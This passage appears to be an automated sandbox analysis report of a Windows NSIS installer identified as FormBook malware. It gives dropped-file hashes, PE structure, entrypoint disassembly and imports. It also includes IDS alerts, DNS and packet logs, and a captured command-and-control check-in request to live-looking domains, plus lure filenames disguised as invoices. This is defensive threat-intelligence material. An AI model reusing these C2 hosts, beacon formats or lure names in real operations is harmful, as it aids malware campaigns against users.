                                                                                     • Proforma Invoice and Bank swift-REG.PI-0086547654.exe (Detection: malicious)
                                                                                     • UGGJ4NnzFz.exe (Detection: malicious)

                                                                                    Created / dropped Files

                                                                                    C:\Users\user\AppData\Local\Temp\7us089c3e295ppclg6d9
                                                                                    Process:C:\Users\user\Desktop\2435.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):185856
                                                                                    Entropy (8bit):7.99888602903792
                                                                                    Encrypted:true
                                                                                    SSDEEP:3072:65VNf/TDZwRRAkO7E7kbp7Vl9t2LhmgKWRqzMZa13EF9vEA5zTreL2aO+O+Ln5kB:4VNf/TDZwRWemHih7dR+h13Ev8AJTreq
                                                                                    MD5:1627D711EE3FADA81CB858B5682C85D2
                                                                                    SHA1:EFB13FDD0B52CF4E38DB413F55E32499CCEA29C7
                                                                                    SHA-256:3022E519B47BD426CB96248689E855D363BA2F4EBB55F77CF5507AB2E6738EB8
                                                                                    SHA-512:81D0E226A8BD6F51248B4A9E8B955B03DA877637DBBA101BE4B374F0C80EBFE226AF3D3D1F5D18E8A6429F54B9634363E4A8BF2B8D56CAA549DCC14F54AA1AC5
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    C:\Users\user\AppData\Local\Temp\nsq165.tmp
                                                                                    Process:C:\Users\user\Desktop\2435.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):282767
                                                                                    Entropy (8bit):7.422689004181164
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:ydiVNf/TDZwRWemHih7dR+h13Ev8AJTreji+iLBB02OVaDut:1xFwE/mZRKEv8AVejqLBBFOVAm
                                                                                    MD5:2213022F76B392D6513DB66830C31224
                                                                                    SHA1:F6E1A73360DE6224A5ADB6A72486DACD7D8680C1
                                                                                    SHA-256:F47B6AB6DFAC7A60DEEC2078801BFF19C808BB3485E6A56A9214FE81F979A1A7
                                                                                    SHA-512:D1E4C16D19F210FB0E2F93BB652BA8D9F0F05985BECE148BF075A233A394B20B8FA303CDEE1CFC5B80E3A3B628F65A1B6ABF1C5B0C31525A969F04DFD6757499
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    C:\Users\user\AppData\Local\Temp\nsq166.tmp\System.dll
                                                                                    Process:C:\Users\user\Desktop\2435.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):11776
                                                                                    Entropy (8bit):5.855045165595541
                                                                                    Encrypted:false
                                                                                    SSDEEP:192:xPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4v:g7VpNo8gmOyRsVc4
                                                                                    MD5:FCCFF8CB7A1067E23FD2E2B63971A8E1
                                                                                    SHA1:30E2A9E137C1223A78A0F7B0BF96A1C361976D91
                                                                                    SHA-256:6FCEA34C8666B06368379C6C402B5321202C11B00889401C743FB96C516C679E
                                                                                    SHA-512:F4335E84E6F8D70E462A22F1C93D2998673A7616C868177CAC3E8784A3BE1D7D0BB96F2583FA0ED82F4F2B6B8F5D9B33521C279A42E055D80A94B4F3F1791E0C
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                     • Antivirus: Metadefender, Detection: 0%
                                                                                     • Antivirus: ReversingLabs, Detection: 0%
                                                                                     Joe Sandbox View:
                                                                                     • Filename: INVOICE.exe, Detection: malicious
                                                                                     • Filename: Shipment Invoice & Consignment Notification.exe, Detection: malicious
                                                                                     • Filename: KY4cmAI0jU.exe, Detection: malicious
                                                                                     • Filename: 5t2CmTUhKc.exe, Detection: malicious
                                                                                     • Filename: 8qdfmqz1PN.exe, Detection: malicious
                                                                                     • Filename: New Order PO2193570O1.doc, Detection: malicious
                                                                                     • Filename: L2.xlsx, Detection: malicious
                                                                                     • Filename: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx, Detection: malicious
                                                                                     • Filename: New Order PO2193570O1.pdf.exe, Detection: malicious
                                                                                     • Filename: 2320900000000.exe, Detection: malicious
                                                                                     • Filename: CshpH9OSkc.exe, Detection: malicious
                                                                                     • Filename: 5SXTKXCnqS.exe, Detection: malicious
                                                                                     • Filename: i6xFULh8J5.exe, Detection: malicious
                                                                                     • Filename: AWB00028487364 -000487449287.doc, Detection: malicious
                                                                                     • Filename: 090049000009000.exe, Detection: malicious
                                                                                     • Filename: dYy3yfSkwY.exe, Detection: malicious
                                                                                     • Filename: PAYMENT 02.BHN-DK.2021 (PO#4500111226).xlsx, Detection: malicious
                                                                                     • Filename: Purchase Order Price List 061021.xlsx, Detection: malicious
                                                                                     • Filename: Proforma Invoice and Bank swift-REG.PI-0086547654.exe, Detection: malicious
                                                                                     • Filename: UGGJ4NnzFz.exe, Detection: malicious
                                                                                    Reputation:moderate, very likely benign file
                                                                                    C:\Users\user\AppData\Local\Temp\sbmborptcxfjep
                                                                                    Process:C:\Users\user\Desktop\2435.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):57185
                                                                                    Entropy (8bit):4.984632645340986
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:/7VNqmd/WNWRdN9UKYDnr3ArvJcXBFRW45fZ2SjL0djJsa7FqkcKHqTW4ipLc4+C:Hb/W4dNmr34vSXR5h2O0Dsa7k8p+UQS
                                                                                    MD5:D3A1658292AB20E82B114799AE33644E
                                                                                    SHA1:71FFB4BCD29917B2E177AFA1D5B9B30056DA6FA6
                                                                                    SHA-256:AD00C8FCF5DCE9F7CDA163E7746E1070BDC50F0791664731F8F9AA226741E57E
                                                                                    SHA-512:DB81E4EAC967E36DF3115A51F628492D8EC369D34202ECA31BCE6A8C0974B585F7866EBE7668AC9C5309EC3CAACEEB57023C1C3C1F72F13DA0DB7D9F1EC045F8
                                                                                    Malicious:false
                                                                                    Reputation:low

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                    Entropy (8bit):7.92290852118761
                                                                                    TrID:
                                                                                    • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                                    • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                    File name:2435.exe
                                                                                    File size:241748
                                                                                    MD5:862b4c2abad2c07ac13d5e051c18ab86
                                                                                    SHA1:c78f0a59312c7902e445c5a31d4896907e96475c
                                                                                    SHA256:c347c2d7579053d263f6ab6eddca7bd03691ebab93b30b5caba462caa7106beb
                                                                                    SHA512:a4972c953b97e257c9c86528aa948b38dd4bcdef0cb2e1c5a661be864ce9d305efc499f40c8e2e9187541200df5b81c5e1c364a6a5169003357ae912596425f9
                                                                                    SSDEEP:6144:Ds9e9CRE9m5SmMZ0AQV3Xtx4abWIj9Jtbs:yemUlmMKAQp9tpjPtbs

                                                                                    File Icon

                                                                                    Icon Hash:b2a88c96b2ca6a72

                                                                                    Static PE Info

                                                                                    General

                                                                                    Entrypoint:0x40323c
                                                                                    Entrypoint Section:.text
                                                                                    Digitally signed:false
                                                                                    Imagebase:0x400000
                                                                                    Subsystem:windows gui
                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                    Time Stamp:0x4B1AE3C6 [Sat Dec 5 22:50:46 2009 UTC]
                                                                                    TLS Callbacks:
                                                                                    CLR (.Net) Version:
                                                                                    OS Version Major:4
                                                                                    OS Version Minor:0
                                                                                    File Version Major:4
                                                                                    File Version Minor:0
                                                                                    Subsystem Version Major:4
                                                                                    Subsystem Version Minor:0
                                                                                    Import Hash:099c0646ea7282d232219f8807883be0

                                                                                    Entrypoint Preview

                                                                                    Instruction
                                                                                    sub esp, 00000180h
                                                                                    push ebx
                                                                                    push ebp
                                                                                    push esi
                                                                                    xor ebx, ebx
                                                                                    push edi
                                                                                    mov dword ptr [esp+18h], ebx
                                                                                    mov dword ptr [esp+10h], 00409130h
                                                                                    xor esi, esi
                                                                                    mov byte ptr [esp+14h], 00000020h
                                                                                    call dword ptr [00407030h]
                                                                                    push 00008001h
                                                                                    call dword ptr [004070B4h]
                                                                                    push ebx
                                                                                    call dword ptr [0040727Ch]
                                                                                    push 00000008h
                                                                                    mov dword ptr [00423F58h], eax
                                                                                    call 00007FEC80AE5A6Eh
                                                                                    mov dword ptr [00423EA4h], eax
                                                                                    push ebx
                                                                                    lea eax, dword ptr [esp+34h]
                                                                                    push 00000160h
                                                                                    push eax
                                                                                    push ebx
                                                                                    push 0041F458h
                                                                                    call dword ptr [00407158h]
                                                                                    push 004091B8h
                                                                                    push 004236A0h
                                                                                    call 00007FEC80AE5721h
                                                                                    call dword ptr [004070B0h]
                                                                                    mov edi, 00429000h
                                                                                    push eax
                                                                                    push edi
                                                                                    call 00007FEC80AE570Fh
                                                                                    push ebx
                                                                                    call dword ptr [0040710Ch]
                                                                                    cmp byte ptr [00429000h], 00000022h
                                                                                    mov dword ptr [00423EA0h], eax
                                                                                    mov eax, edi
                                                                                    jne 00007FEC80AE2E6Ch
                                                                                    mov byte ptr [esp+14h], 00000022h
                                                                                    mov eax, 00429001h
                                                                                    push dword ptr [esp+14h]
                                                                                    push eax
                                                                                    call 00007FEC80AE5202h
                                                                                    push eax
                                                                                    call dword ptr [0040721Ch]
                                                                                    mov dword ptr [esp+1Ch], eax
                                                                                    jmp 00007FEC80AE2EC5h
                                                                                    cmp cl, 00000020h
                                                                                    jne 00007FEC80AE2E68h
                                                                                    inc eax
                                                                                    cmp byte ptr [eax], 00000020h
                                                                                    je 00007FEC80AE2E5Ch
                                                                                    cmp byte ptr [eax], 00000022h
                                                                                    mov byte ptr [eax+eax+00h], 00000000h

Rich Headers

Programming Language:
• [EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x9e0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x5a5a | 0x5c00 | False | 0.660453464674 | data | 6.41769823686 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.4453125 | data | 5.18162709925 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x1af98 | 0x400 | False | 0.55859375 | data | 4.70902740305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x2c000 | 0x9e0 | 0xa00 | False | 0.45625 | data | 4.51012867721 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
RT_MANIFEST | 0x2c710 | 0x2cc | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States

Imports

DLL | Import
KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system | Country where language is spoken
English | United States

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-12:13:57.288476 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 199.59.242.153
06/11/21-12:13:57.288476 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 199.59.242.153
06/11/21-12:13:57.288476 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49719 | 80 | 192.168.2.5 | 199.59.242.153
06/11/21-12:14:18.417415 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 34.102.136.180
06/11/21-12:14:18.417415 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 34.102.136.180
06/11/21-12:14:18.417415 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49720 | 80 | 192.168.2.5 | 34.102.136.180
06/11/21-12:14:18.562024 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49720 | 34.102.136.180 | 192.168.2.5

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 12:13:57.109199047 CEST | 49719 | 80 | 192.168.2.5 | 199.59.242.153
Jun 11, 2021 12:13:57.261039019 CEST | 80 | 49719 | 199.59.242.153 | 192.168.2.5
Jun 11, 2021 12:13:57.261240005 CEST | 49719 | 80 | 192.168.2.5 | 199.59.242.153
Jun 11, 2021 12:13:57.288475990 CEST | 49719 | 80 | 192.168.2.5 | 199.59.242.153
Jun 11, 2021 12:13:57.415497065 CEST | 80 | 49719 | 199.59.242.153 | 192.168.2.5
Jun 11, 2021 12:13:57.415965080 CEST | 80 | 49719 | 199.59.242.153 | 192.168.2.5
Jun 11, 2021 12:13:57.415990114 CEST | 80 | 49719 | 199.59.242.153 | 192.168.2.5
Jun 11, 2021 12:13:57.416002035 CEST | 80 | 49719 | 199.59.242.153 | 192.168.2.5
Jun 11, 2021 12:13:57.416013002 CEST | 80 | 49719 | 199.59.242.153 | 192.168.2.5
Jun 11, 2021 12:13:57.416026115 CEST | 80 | 49719 | 199.59.242.153 | 192.168.2.5
Jun 11, 2021 12:13:57.416174889 CEST | 49719 | 80 | 192.168.2.5 | 199.59.242.153
Jun 11, 2021 12:13:58.092125893 CEST | 49719 | 80 | 192.168.2.5 | 199.59.242.153
Jun 11, 2021 12:14:18.374717951 CEST | 49720 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 12:14:18.417139053 CEST | 80 | 49720 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 12:14:18.417279959 CEST | 49720 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 12:14:18.417414904 CEST | 49720 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 12:14:18.459662914 CEST | 80 | 49720 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 12:14:18.562024117 CEST | 80 | 49720 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 12:14:18.562061071 CEST | 80 | 49720 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 12:14:18.562263966 CEST | 49720 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 12:14:18.562402010 CEST | 49720 | 80 | 192.168.2.5 | 34.102.136.180
Jun 11, 2021 12:14:18.604703903 CEST | 80 | 49720 | 34.102.136.180 | 192.168.2.5
Jun 11, 2021 12:14:38.937189102 CEST | 49722 | 80 | 192.168.2.5 | 170.39.76.111
Jun 11, 2021 12:14:39.094544888 CEST | 80 | 49722 | 170.39.76.111 | 192.168.2.5
Jun 11, 2021 12:14:39.094655991 CEST | 49722 | 80 | 192.168.2.5 | 170.39.76.111
Jun 11, 2021 12:14:39.094999075 CEST | 49722 | 80 | 192.168.2.5 | 170.39.76.111
Jun 11, 2021 12:14:39.253957033 CEST | 80 | 49722 | 170.39.76.111 | 192.168.2.5
Jun 11, 2021 12:14:39.417160988 CEST | 80 | 49722 | 170.39.76.111 | 192.168.2.5
Jun 11, 2021 12:14:39.417213917 CEST | 80 | 49722 | 170.39.76.111 | 192.168.2.5
Jun 11, 2021 12:14:39.417313099 CEST | 49722 | 80 | 192.168.2.5 | 170.39.76.111
Jun 11, 2021 12:14:39.417368889 CEST | 49722 | 80 | 192.168.2.5 | 170.39.76.111
Jun 11, 2021 12:14:39.574393034 CEST | 80 | 49722 | 170.39.76.111 | 192.168.2.5

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 12:12:37.014842987 CEST | 54302 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:37.018404007 CEST | 53784 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:37.074642897 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:37.078557014 CEST | 53 | 53784 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:37.089776039 CEST | 53 | 54302 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:37.126888037 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:37.202214956 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:37.252634048 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:39.975965023 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:40.038592100 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:43.154540062 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:43.208348989 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:44.512192965 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:44.562550068 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:45.898520947 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:45.948964119 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:47.976841927 CEST | 61733 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:48.029856920 CEST | 53 | 61733 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:49.435123920 CEST | 65447 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:49.485213041 CEST | 53 | 65447 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:50.274744034 CEST | 52441 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:50.325207949 CEST | 53 | 52441 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:51.934648991 CEST | 62176 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:51.984662056 CEST | 53 | 62176 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:52.814543009 CEST | 59596 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:52.864653111 CEST | 53 | 59596 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:54.049725056 CEST | 65296 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:54.101264000 CEST | 53 | 65296 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:12:55.797203064 CEST | 63183 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:12:55.850246906 CEST | 53 | 63183 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:13:03.494420052 CEST | 60151 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:13:03.554992914 CEST | 53 | 60151 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:13:28.216379881 CEST | 56969 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:13:28.287094116 CEST | 53 | 56969 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:13:31.261404991 CEST | 55161 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:13:31.329421043 CEST | 53 | 55161 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:13:54.522371054 CEST | 54757 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:13:54.586051941 CEST | 53 | 54757 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:13:56.956886053 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:13:57.103427887 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:14:18.308631897 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:14:18.373300076 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:14:22.118520975 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:14:22.179194927 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:14:38.757014036 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:14:38.936023951 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
Jun 11, 2021 12:14:39.369801044 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Jun 11, 2021 12:14:39.447465897 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 12:13:56.956886053 CEST | 192.168.2.5 | 8.8.8.8 | 0x3c07 | Standard query (0) | www.northsytyle.com | A (IP address) | IN (0x0001)
Jun 11, 2021 12:14:18.308631897 CEST | 192.168.2.5 | 8.8.8.8 | 0x40ab | Standard query (0) | www.shitarpa.net | A (IP address) | IN (0x0001)
Jun 11, 2021 12:14:38.757014036 CEST | 192.168.2.5 | 8.8.8.8 | 0x6540 | Standard query (0) | www.houseofsisson.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 12:13:57.103427887 CEST | 8.8.8.8 | 192.168.2.5 | 0x3c07 | No error (0) | www.northsytyle.com | | 199.59.242.153 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:14:18.373300076 CEST | 8.8.8.8 | 192.168.2.5 | 0x40ab | No error (0) | www.shitarpa.net | shitarpa.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:14:18.373300076 CEST | 8.8.8.8 | 192.168.2.5 | 0x40ab | No error (0) | shitarpa.net | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jun 11, 2021 12:14:38.936023951 CEST | 8.8.8.8 | 192.168.2.5 | 0x6540 | No error (0) | www.houseofsisson.com | houseofsisson.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 12:14:38.936023951 CEST | 8.8.8.8 | 192.168.2.5 | 0x6540 | No error (0) | houseofsisson.com | | 170.39.76.111 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.northsytyle.com
• www.shitarpa.net
• www.houseofsisson.com

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49719 | 199.59.242.153 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 11, 2021 12:13:57.288475990 CEST | 5091 | OUT | GET /dxe/?Wj0xll=4hH838s0e&EDHT4Ftp=vA37WJpcpzFfNUYXQYg75GtNYSPqw6GeTU1J6B6lZdudLhYIKqXqgoVRncSpzE3J3g/W HTTP/1.1
Host: www.northsytyle.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Jun 11, 2021 12:13:57.415965080 CEST | 5092 | IN | HTTP/1.1 200 OK
Server: openresty
Date: Fri, 11 Jun 2021 10:13:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CWASVN2Fkx8Lz77aRYdiQgq6MDgGAsj0QbR5uqnRq7VXF0P0RHizFVKPsOkX86dPOS7L9FeqbRKHFNclm7c8RQ==
